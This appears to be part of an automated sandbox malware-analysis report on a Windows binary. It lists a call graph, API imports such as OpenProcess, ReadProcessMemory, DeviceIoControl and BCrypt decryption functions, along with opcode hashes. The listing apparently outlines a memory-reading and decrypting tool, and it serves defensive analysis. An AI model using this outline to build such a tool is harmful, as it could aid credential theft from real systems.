3234->3238 3236 7ff72e905ba8 3235->3236 3252 7ff72e90739c LeaveCriticalSection 3235->3252 3241 7ff72e905bd3 3236->3241 3249 7ff72e90739c LeaveCriticalSection 3236->3249 3247 7ff72e905af4 3238->3247 3240 7ff72e905bc1 3242 7ff72e90588c malloc GetModuleHandleW GetProcAddress 3240->3242 3243 7ff72e905bc9 ExitProcess 3242->3243 3245 7ff72e905b13 DecodePointer 3251 7ff72e90518c EncodePointer 3245->3251 3247->3235 3247->3245 3248 7ff72e905b29 DecodePointer DecodePointer 3247->3248 3250 7ff72e90518c EncodePointer 3247->3250 3248->3247 3254 7ff72e908c4b 3253->3254 3255 7ff72e908c41 3253->3255 3256 7ff72e905810 _errno 62 API calls 3254->3256 3255->3254 3260 7ff72e908c68 3255->3260 3257 7ff72e908c54 3256->3257 3265 7ff72e9057a8 3257->3265 3259 7ff72e908c60 3259->3042 3260->3259 3261 7ff72e905810 _errno 62 API calls 3260->3261 3261->3257 3275 7ff72e9055b8 3262->3275 3268 7ff72e905738 DecodePointer 3265->3268 3267 7ff72e9057c1 3267->3259 3269 7ff72e905776 3268->3269 3270 7ff72e905797 3268->3270 3269->3267 3271 7ff72e905704 _amsg_exit 16 API calls 3270->3271 3272 7ff72e9057a6 3271->3272 3273 7ff72e905738 _invalid_parameter_noinfo 16 API calls 3272->3273 3274 7ff72e9057c1 3273->3274 3274->3267 3276 7ff72e9055f2 __initmbctable _amsg_exit 3275->3276 3277 7ff72e90560e RtlCaptureContext RtlLookupFunctionEntry 3276->3277 3278 7ff72e90567e 3277->3278 3279 7ff72e905647 RtlVirtualUnwind 3277->3279 3280 7ff72e90569a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3278->3280 3279->3280 3281 7ff72e9056cc _amsg_exit 3280->3281 3284 7ff72e907270 3281->3284 3283 7ff72e9056eb GetCurrentProcess TerminateProcess 3285 7ff72e907279 3284->3285 3286 7ff72e907284 3285->3286 3287 7ff72e908e70 RtlCaptureContext RtlLookupFunctionEntry 3285->3287 3286->3283 3288 7ff72e908eb4 RtlVirtualUnwind 3287->3288 3289 7ff72e908ef5 3287->3289 3290 7ff72e908f17 IsDebuggerPresent 3288->3290 3289->3290 3295 7ff72e908024 3290->3295 3292 7ff72e908f76 SetUnhandledExceptionFilter UnhandledExceptionFilter 3293 7ff72e908f9e GetCurrentProcess TerminateProcess 3292->3293 3294 7ff72e908f94 _amsg_exit 3292->3294 3293->3283 3294->3293 3295->3292 3297 7ff72e9087ca EncodePointer 3296->3297 3297->3297 3298 7ff72e9087df 3297->3298 3298->3054 3302 7ff72e908690 3299->3302 3315 7ff72e9058e0 3302->3315 3317 7ff72e902541 3316->3317 3318 7ff72e902498 InitializeSecurityDescriptor 3316->3318 3317->3058 3318->3317 3319 7ff72e9024ac SetSecurityDescriptorDacl 3318->3319 3319->3317 3320 7ff72e9024c4 CreateFileW 3319->3320 3320->3317 3321 7ff72e9024f8 GetModuleHandleW GetProcAddress 3320->3321 3322 7ff72e902517 3321->3322 3322->3317 3322->3320 3323 7ff72e90251e Sleep 3322->3323 3324 7ff72e90252b WaitNamedPipeW 3322->3324 3323->3322 3324->3317 3324->3322 3343 7ff72e903278 3325->3343 3327 7ff72e9039db 3327->3060 3329 7ff72e903769 3329->3327 3337 7ff72e903774 3329->3337 3331 7ff72e90377b GetModuleHandleW GetProcAddress 3331->3337 3332 7ff72e9039d7 3332->3327 3333 7ff72e9039c2 LocalFree 3333->3337 3334 7ff72e902344 15 API calls 3334->3337 3335 7ff72e903903 GetModuleHandleW GetProcAddress 3335->3337 3337->3331 3337->3332 3337->3333 3337->3334 3337->3335 3338 7ff72e903970 LocalFree 3337->3338 3339 7ff72e9011dc 13 API calls 3337->3339 3340 7ff72e903983 LocalFree 3337->3340 3341 7ff72e903996 LocalFree 3337->3341 3342 7ff72e9039a5 LocalFree 3337->3342 3396 7ff72e903a60 GetComputerNameW 3337->3396 3338->3337 3339->3337 3340->3337 3341->3337 3342->3337 3344 7ff72e9035ce 3343->3344 3345 7ff72e9032b9 3343->3345 3344->3327 3344->3329 3369 7ff72e9011dc 3344->3369 3406 7ff72e902ac0 3345->3406 3347 7ff72e9032de CreateFileW 3349 7ff72e903390 3347->3349 3348 7ff72e90330a RtlInitUnicodeString 3414 7ff72e90195c 3348->3414 3359 7ff72e90353a 3349->3359 3421 7ff72e90106c GetModuleHandleW GetProcAddress 3349->3421 3352 7ff72e9035bb FindCloseChangeNotification 3352->3344 3353 7ff72e9035a5 LocalFree 3357 7ff72e9035af LocalFree 3353->3357 3354 7ff72e9033bb 3354->3359 3434 7ff72e901a64 3354->3434 3356 7ff72e903571 3356->3353 3356->3357 3357->3352 3358 7ff72e903345 3358->3359 3360 7ff72e90336f LocalFree 3358->3360 3484 7ff72e901a18 RtlEqualUnicodeString 3358->3484 3359->3344 3359->3352 3359->3353 3359->3356 3359->3357 3361 7ff72e903591 UnmapViewOfFile 3359->3361 3362 7ff72e903597 3359->3362 3360->3359 3363 7ff72e903382 OpenProcess 3360->3363 3361->3362 3362->3353 3364 7ff72e90359c CloseHandle 3362->3364 3363->3349 3364->3353 3370 7ff72e901216 3369->3370 3381 7ff72e901374 3369->3381 3371 7ff72e9012e3 3370->3371 3372 7ff72e90121e 3370->3372 3376 7ff72e9012eb WriteProcessMemory 3371->3376 3377 7ff72e901309 GetModuleHandleW GetProcAddress 3371->3377 3373 7ff72e901223 3372->3373 3374 7ff72e9012a2 3372->3374 3378 7ff72e90129b __initmbctable 3373->3378 3379 7ff72e90122c 3373->3379 3374->3377 3380 7ff72e9012aa DeviceIoControl 3374->3380 3375 7ff72e901434 ReadProcessMemory 3375->3378 3376->3378 3385 7ff72e901330 3377->3385 3378->3329 3379->3377 3383 7ff72e901238 3379->3383 3380->3378 3381->3375 3381->3378 3382 7ff72e901414 3381->3382 3384 7ff72e9013eb 3381->3384 3388 7ff72e90139f SetFilePointer 3381->3388 3382->3375 3386 7ff72e90123e SetFilePointer 3383->3386 3387 7ff72e90125c GetModuleHandleW GetProcAddress 3383->3387 3539 7ff72e901000 3384->3539 3385->3378 3390 7ff72e9011dc DeviceIoControl 3385->3390 3386->3378 3386->3387 3387->3378 3388->3378 3391 7ff72e9013bd GetModuleHandleW GetProcAddress 3388->3391 3392 7ff72e90134e 3390->3392 3391->3384 3393 7ff72e901364 LocalFree 3392->3393 3394 7ff72e9011dc DeviceIoControl 3392->3394 3393->3378 3395 7ff72e901362 3394->3395 3395->3393 3397 7ff72e903a9b 3396->3397 3401 7ff72e903ad1 3396->3401 3543 7ff72e9039f8 3397->3543 3399 7ff72e903aa4 3400 7ff72e903aac StrCmpIW LocalFree 3399->3400 3399->3401 3400->3401 3404 7ff72e903b50 3400->3404 3402 7ff72e9039f8 2 API calls 3401->3402 3401->3404 3405 7ff72e903b02 3402->3405 3403 7ff72e903b47 LocalFree 3403->3404 3404->3337 3405->3403 3405->3404 3407 7ff72e902c4c 3406->3407 3408 7ff72e902ad1 3406->3408 3407->3344 3407->3347 3407->3348 3409 7ff72e902adf GetModuleHandleW GetProcAddress LoadLibraryW 3408->3409 3412 7ff72e902bf5 3408->3412 3409->3407 3410 7ff72e902b15 8 API calls 3409->3410 3411 7ff72e902bf3 3410->3411 3410->3412 3411->3407 3412->3407 3486 7ff72e902cf4 3412->3486 3415 7ff72e901988 NtQuerySystemInformation 3414->3415 3420 7ff72e901998 3414->3420 3416 7ff72e9019f8 3415->3416 3416->3358 3417 7ff72e90199d GetModuleHandleW GetProcAddress LocalAlloc 3417->3416 3418 7ff72e9019cc NtQuerySystemInformation 3417->3418 3419 7ff72e9019e4 LocalFree 3418->3419 3418->3420 3419->3420 3420->3416 3420->3417 3422 7ff72e9010c2 3421->3422 3423 7ff72e9010e0 3422->3423 3424 7ff72e901178 GetModuleHandleW GetProcAddress 3422->3424 3425 7ff72e90111d 3422->3425 3432 7ff72e901123 3422->3432 3426 7ff72e9010e4 3423->3426 3427 7ff72e901137 GetModuleHandleW GetProcAddress 3423->3427 3429 7ff72e901110 3424->3429 3428 7ff72e9011af LocalFree 3425->3428 3425->3432 3426->3428 3430 7ff72e9010f1 GetModuleHandleW GetProcAddress 3426->3430 3431 7ff72e901156 3427->3431 3428->3432 3429->3425 3430->3429 3431->3428 3493 7ff72e90162c GetModuleHandleW GetProcAddress 3431->3493 3432->3354 3435 7ff72e901f70 3434->3435 3436 7ff72e901acf 3434->3436 3439 7ff72e902244 16 API calls 3435->3439 3437 7ff72e901cd0 3436->3437 3438 7ff72e901ad7 3436->3438 3502 7ff72e902244 3437->3502 3440 7ff72e901adf 3438->3440 3451 7ff72e901c32 3438->3451 3445 7ff72e901f7f 3439->3445 3442 7ff72e90195c 6 API calls 3440->3442 3465 7ff72e901ae3 3440->3465 3450 7ff72e901afe 3442->3450 3443 7ff72e901fd6 3447 7ff72e902244 16 API calls 3443->3447 3443->3465 3444 7ff72e901ce9 3446 7ff72e9011dc 13 API calls 3444->3446 3444->3465 3445->3443 3448 7ff72e90207c 20 API calls 3445->3448 3471 7ff72e901d1b 3446->3471 3455 7ff72e901ffe 3447->3455 3448->3445 3449 7ff72e901e1f 3453 7ff72e902244 16 API calls 3449->3453 3449->3465 3454 7ff72e901b8a GetModuleHandleW GetProcAddress 3450->3454 3457 7ff72e901be2 RtlInitUnicodeString 3450->3457 3450->3465 3452 7ff72e901c97 RtlInitUnicodeString 3451->3452 3451->3465 3456 7ff72e90207c 20 API calls 3452->3456 3458 7ff72e901e3d 3453->3458 3461 7ff72e901bb6 3454->3461 3459 7ff72e90207c 20 API calls 3455->3459 3455->3465 3456->3451 3462 7ff72e901c07 LocalFree 3457->3462 3463 7ff72e9011dc 13 API calls 3458->3463 3458->3465 3459->3455 3460 7ff72e901d70 GetModuleHandleW GetProcAddress 3460->3471 3461->3450 3462->3450 3467 7ff72e901e71 3463->3467 3464 7ff72e9011dc 13 API calls 3464->3471 3465->3359 3476 7ff72e903e00 3465->3476 3466 7ff72e901e03 LocalFree 3466->3471 3467->3465 3469 7ff72e9011dc 13 API calls 3467->3469 3470 7ff72e901ec0 GetModuleHandleW GetProcAddress 3467->3470 3469->3467 3475 7ff72e901f09 3470->3475 3471->3449 3471->3460 3471->3464 3471->3465 3471->3466 3511 7ff72e90207c 3471->3511 3472 7ff72e9011dc 13 API calls 3472->3475 3473 7ff72e901f50 LocalFree 3473->3467 3474 7ff72e90207c 20 API calls 3474->3475 3475->3467 3475->3472 3475->3473 3475->3474 3477 7ff72e903f1d 3476->3477 3478 7ff72e903e5a 3476->3478 3477->3359 3478->3477 3526 7ff72e901478 3478->3526 3480 7ff72e903e95 3480->3477 3481 7ff72e9011dc 13 API calls 3480->3481 3482 7ff72e903ed2 3481->3482 3482->3477 3483 7ff72e9011dc 13 API calls 3482->3483 3483->3477 3485 7ff72e901a47 3484->3485 3485->3358 3488 7ff72e902d18 3486->3488 3487 7ff72e902e78 3487->3407 3488->3487 3489 7ff72e902d8c GetModuleHandleW GetProcAddress 3488->3489 3490 7ff72e902db8 3489->3490 3490->3487 3491 7ff72e902e45 GetModuleHandleW GetProcAddress 3490->3491 3492 7ff72e902e71 3491->3492 3492->3487 3494 7ff72e901668 3493->3494 3495 7ff72e901674 CreateFileMappingW 3494->3495 3501 7ff72e9016e0 3494->3501 3496 7ff72e9016a0 MapViewOfFile 3495->3496 3497 7ff72e9016c6 3495->3497 3496->3497 3498 7ff72e9016f3 UnmapViewOfFile 3497->3498 3499 7ff72e9016f9 3497->3499 3497->3501 3498->3499 3500 7ff72e901701 CloseHandle 3499->3500 3499->3501 3500->3501 3501->3429 3503 7ff72e902279 GetCurrentProcess 3502->3503 3504 7ff72e902270 3502->3504 3503->3504 3505 7ff72e9022c5 3504->3505 3506 7ff72e9022c9 NtQueryInformationProcess 3504->3506 3507 7ff72e902329 RtlGetCurrentPeb 3504->3507 3505->3506 3510 7ff72e902304 __initmbctable 3505->3510 3508 7ff72e9022e2 3506->3508 3506->3510 3507->3510 3509 7ff72e9011dc 13 API calls 3508->3509 3508->3510 3509->3510 3510->3444 3512 7ff72e9011dc 13 API calls 3511->3512 3513 7ff72e9020d3 3512->3513 3514 7ff72e9021c9 3513->3514 3515 7ff72e9020ea GetModuleHandleW GetProcAddress 3513->3515 3514->3471 3516 7ff72e90211c 3515->3516 3516->3514 3517 7ff72e9011dc 13 API calls 3516->3517 3518 7ff72e902139 GetModuleHandleW GetProcAddress 3517->3518 3520 7ff72e902177 3518->3520 3519 7ff72e902196 LocalFree 3519->3514 3524 7ff72e9021b8 LocalFree 3519->3524 3520->3519 3521 7ff72e9011dc 13 API calls 3520->3521 3523 7ff72e902190 3521->3523 3523->3519 3525 7ff72e90219c LocalFree 3523->3525 3524->3514 3525->3519 3527 7ff72e9014d4 3526->3527 3531 7ff72e9014f3 3526->3531 3528 7ff72e901556 GetModuleHandleW GetProcAddress LocalAlloc 3527->3528 3529 7ff72e9014ea 3527->3529 3527->3531 3535 7ff72e901517 3527->3535 3530 7ff72e90158b 3528->3530 3528->3531 3529->3528 3529->3531 3532 7ff72e9011dc 13 API calls 3530->3532 3531->3480 3533 7ff72e90159b 3532->3533 3534 7ff72e9015b3 LocalFree 3533->3534 3536 7ff72e901478 13 API calls 3533->3536 3534->3531 3535->3531 3538 7ff72e901478 13 API calls 3535->3538 3536->3534 3538->3531 3540 7ff72e901016 DeviceIoControl 3539->3540 3542 7ff72e901059 3540->3542 3542->3382 3544 7ff72e903a0c GetModuleHandleW GetProcAddress 3543->3544 3545 7ff72e903a37 __initmbctable 3543->3545 3544->3545 3545->3399 3547 7ff72e908ca4 3546->3547 3548 7ff72e905810 _errno 62 API calls 3547->3548 3551 7ff72e905ee6 3547->3551 3549 7ff72e908cc9 3548->3549 3550 7ff72e9057a8 _invalid_parameter_noinfo 17 API calls 3549->3550 3550->3551 3551->3070 3551->3071 3556 7ff72e908b54 3552->3556 3553 7ff72e908b59 3554 7ff72e905da8 3553->3554 3555 7ff72e905810 _errno 62 API calls 3553->3555 3554->3096 3554->3109 3557 7ff72e908b83 3555->3557 3556->3553 3556->3554 3559 7ff72e908b97 3556->3559 3558 7ff72e9057a8 _invalid_parameter_noinfo 17 API calls 3557->3558 3558->3554 3559->3554 3560 7ff72e905810 _errno 62 API calls 3559->3560 3560->3557 3562 7ff72e908ad7 3561->3562 3564 7ff72e908acd 3561->3564 3563 7ff72e905810 _errno 62 API calls 3562->3563 3569 7ff72e908ae0 3563->3569 3564->3562 3566 7ff72e908b0e 3564->3566 3565 7ff72e9057a8 _invalid_parameter_noinfo 17 API calls 3567 7ff72e905dd3 3565->3567 3566->3567 3568 7ff72e905810 _errno 62 API calls 3566->3568 3567->3101 3567->3103 3568->3569 3569->3565 3588 7ff72e90518c EncodePointer 3570->3588 3590 7ff72e9058a6 GetProcAddress 3589->3590 3591 7ff72e9058bf ExitProcess 3589->3591 3590->3591 3592 7ff72e9058bb 3590->3592 3592->3591

                                                Executed Functions

                                                Function 00007FF72E90195C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 51nativelibrarymemoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: InformationLocalQuerySystem$AddressAllocFreeHandleModuleProc
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 3225137318-3502785670
                                                • Opcode ID: 94f01879200145af3739c986655f729ea8638cfc54d1f0d8c2aabe165a65a1f6
                                                • Instruction ID: c775890bf5c91ca1dd97ff5717f66a50ff04e6f15b60242181877ed420cd302d
                                                • Opcode Fuzzy Hash: 94f01879200145af3739c986655f729ea8638cfc54d1f0d8c2aabe165a65a1f6
                                                • Instruction Fuzzy Hash: 4E11B672B14A5286EB546B1AFC04228A3A1FB89BD4FD4503ADE9D43724DE3CD440CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E902244 Relevance: 4.6, APIs: 3, Instructions: 79nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: CurrentProcess$InformationQuery
                                                • String ID:
                                                • API String ID: 4257070689-0
                                                • Opcode ID: 24016c5670ef6a44130889d36a211bded3f85692fff664be365332c08a7ab1e6
                                                • Instruction ID: d05745f22541cb61bb9bd2941264e52902f1a5ca08ab4b5aeec74a67e0cd2bff
                                                • Opcode Fuzzy Hash: 24016c5670ef6a44130889d36a211bded3f85692fff664be365332c08a7ab1e6
                                                • Instruction Fuzzy Hash: 1231A032B04A528AEB559F96EC406BD7369FB04B88FC4003ADE8D13744DF38D855CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E902AC0 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 72libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                • String ID: BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptEncrypt$BCryptGenerateSymmetricKey$BCryptGetProperty$BCryptOpenAlgorithmProvider$BCryptSetProperty$LoadLibraryW$bcrypt$kernel32
                                                • API String ID: 384173800-3281753865
                                                • Opcode ID: e9f0c585d2483b32f2c60ff5eea04de2183c66ce1dd5988152d4d5971df24dbe
                                                • Instruction ID: 5bd84a5ba277a5987056afdaa588339d31f8a5f9e9db565fd9ac1375b969ed22
                                                • Opcode Fuzzy Hash: e9f0c585d2483b32f2c60ff5eea04de2183c66ce1dd5988152d4d5971df24dbe
                                                • Instruction Fuzzy Hash: 7F419064D09B1788FE91AB14EC54378A3A0EF857C4FC0513FD88D96260EF7DA189DA23
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E9011DC Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 169libraryloaderinjectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc$FileMemoryPointerProcess$ControlDeviceFreeLocalReadWrite
                                                • String ID: LocalAlloc$ReadFile$WriteFile$kernel32
                                                • API String ID: 142657384-482538141
                                                • Opcode ID: 8daf259e33ea4a93c82d00914d64b11e184bf32111c03331b56777a581bc2aae
                                                • Instruction ID: cbb58599e4538339625d3e8990aba4f799a0aaf6aa6765f152926753670b23d7
                                                • Opcode Fuzzy Hash: 8daf259e33ea4a93c82d00914d64b11e184bf32111c03331b56777a581bc2aae
                                                • Instruction Fuzzy Hash: D4714F36A08A4686EB50AF16E850279B3A0FB89F94BD4803BDACD43764DF3CD545CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E901A64 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 389libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 58 7ff72e901a64-7ff72e901ac9 59 7ff72e901f70-7ff72e901f81 call 7ff72e902244 58->59 60 7ff72e901acf-7ff72e901ad1 58->60 72 7ff72e901f83-7ff72e901f8b 59->72 73 7ff72e901fd9-7ff72e901fe5 59->73 61 7ff72e901cd0-7ff72e901ceb call 7ff72e902244 60->61 62 7ff72e901ad7-7ff72e901ad9 60->62 74 7ff72e902066-7ff72e90207b 61->74 78 7ff72e901cf1-7ff72e901d1d call 7ff72e9011dc 61->78 64 7ff72e901c32-7ff72e901c54 call 7ff72e90171c 62->64 65 7ff72e901adf-7ff72e901ae1 62->65 64->74 84 7ff72e901c5a-7ff72e901c5e 64->84 68 7ff72e901ae3-7ff72e901ae8 65->68 69 7ff72e901aed-7ff72e901b02 call 7ff72e90195c 65->69 68->74 69->74 87 7ff72e901b08-7ff72e901b20 69->87 79 7ff72e901fc9-7ff72e901fd4 72->79 73->74 76 7ff72e901fe7-7ff72e901fe9 73->76 76->74 83 7ff72e901feb-7ff72e902000 call 7ff72e902244 76->83 78->74 96 7ff72e901d23-7ff72e901d36 78->96 81 7ff72e901fd6 79->81 82 7ff72e901f8d-7ff72e901f8f 79->82 81->73 82->81 86 7ff72e901f91-7ff72e901fc5 call 7ff72e90207c 82->86 83->74 99 7ff72e902002-7ff72e902009 83->99 89 7ff72e901c60 84->89 90 7ff72e901cc9-7ff72e901ccb 84->90 86->79 87->74 93 7ff72e901b26-7ff72e901b35 87->93 95 7ff72e901c64-7ff72e901c66 89->95 90->74 98 7ff72e901b3c-7ff72e901b3e 93->98 95->90 100 7ff72e901c68-7ff72e901c87 95->100 101 7ff72e901e16-7ff72e901e19 96->101 98->74 104 7ff72e901b44-7ff72e901b68 98->104 105 7ff72e902056-7ff72e902061 99->105 106 7ff72e901cbd-7ff72e901cc7 100->106 107 7ff72e901c89-7ff72e901cbb call 7ff72e90415c RtlInitUnicodeString call 7ff72e90207c 100->107 102 7ff72e901e1f-7ff72e901e24 101->102 103 7ff72e901d3b-7ff72e901d3d 101->103 102->74 108 7ff72e901e2a-7ff72e901e38 call 7ff72e902244 102->108 103->102 114 7ff72e901d43-7ff72e901d6a call 7ff72e9011dc 103->114 112 7ff72e901b6e-7ff72e901b88 104->112 113 7ff72e901c19-7ff72e901c27 104->113 110 7ff72e902063 105->110 111 7ff72e90200b-7ff72e90200d 105->111 106->90 106->95 107->106 127 7ff72e901e3d-7ff72e901e3f 108->127 110->74 111->110 122 7ff72e90200f-7ff72e902052 call 7ff72e90207c 111->122 120 7ff72e901bdd-7ff72e901be0 112->120 121 7ff72e901b8a-7ff72e901bbc GetModuleHandleW GetProcAddress 112->121 113->98 119 7ff72e901c2d 113->119 130 7ff72e901d70-7ff72e901dc3 GetModuleHandleW GetProcAddress 114->130 131 7ff72e901e0e-7ff72e901e12 114->131 119->74 125 7ff72e901c12 120->125 126 7ff72e901be2-7ff72e901c0c RtlInitUnicodeString LocalFree 120->126 121->120 137 7ff72e901bbe-7ff72e901bca 121->137 122->105 125->113 126->125 127->74 133 7ff72e901e45-7ff72e901e73 call 7ff72e9011dc 127->133 130->131 143 7ff72e901dc5-7ff72e901dea call 7ff72e9011dc 130->143 131->101 133->74 144 7ff72e901e79-7ff72e901e88 133->144 137->120 142 7ff72e901bcc-7ff72e901bdb 137->142 142->120 142->142 150 7ff72e901e03-7ff72e901e08 LocalFree 143->150 151 7ff72e901dec-7ff72e901df1 call 7ff72e90207c 143->151 146 7ff72e901f62-7ff72e901f65 144->146 148 7ff72e901e8d-7ff72e901e8f 146->148 149 7ff72e901f6b 146->149 148->110 152 7ff72e901e95-7ff72e901eba call 7ff72e9011dc 148->152 149->110 150->131 155 7ff72e901df6-7ff72e901e01 151->155 157 7ff72e901ec0-7ff72e901f11 GetModuleHandleW GetProcAddress 152->157 158 7ff72e901f5b-7ff72e901f5e 152->158 155->150 157->158 161 7ff72e901f13-7ff72e901f37 call 7ff72e9011dc 157->161 158->146 164 7ff72e901f50-7ff72e901f55 LocalFree 161->164 165 7ff72e901f39-7ff72e901f4e call 7ff72e90207c 161->165 164->158 165->164
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: InitStringUnicode$AddressFreeHandleLocalModuleProc
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 979628613-3502785670
                                                • Opcode ID: 340a1b91e7e4e046959c71363f41b3112a23e71193b524fa197526ea187408af
                                                • Instruction ID: 4375dcaad0d75addcc41694f39c7a05bbddbe3e11138b871e43c50c28cb447b4
                                                • Opcode Fuzzy Hash: 340a1b91e7e4e046959c71363f41b3112a23e71193b524fa197526ea187408af
                                                • Instruction Fuzzy Hash: 92027176A08B4686EB50DB55E84027AB3A5FB88754FC0013AEE8D43B99EF3CD544CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E902CF4 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 84libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: 3DES$AES$ChainingMode$ChainingModeCBC$ChainingModeCFB$LocalAlloc$ObjectLength$kernel32
                                                • API String ID: 1646373207-1761306045
                                                • Opcode ID: 9f77bb441c1b825aea171bdd8c13abe2f88182e032095ff36467865f771ed3e4
                                                • Instruction ID: a4d1befba90a0431dde4dcaf5545b16f3e60e67d6f9c4ea80bd9cb90faa4b95f
                                                • Opcode Fuzzy Hash: 9f77bb441c1b825aea171bdd8c13abe2f88182e032095ff36467865f771ed3e4
                                                • Instruction Fuzzy Hash: 86411E71A08B0786FB40AB15FC64669A360FF85798FC0103BD58D5B664EF3DE149CB22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E903650 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 222libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
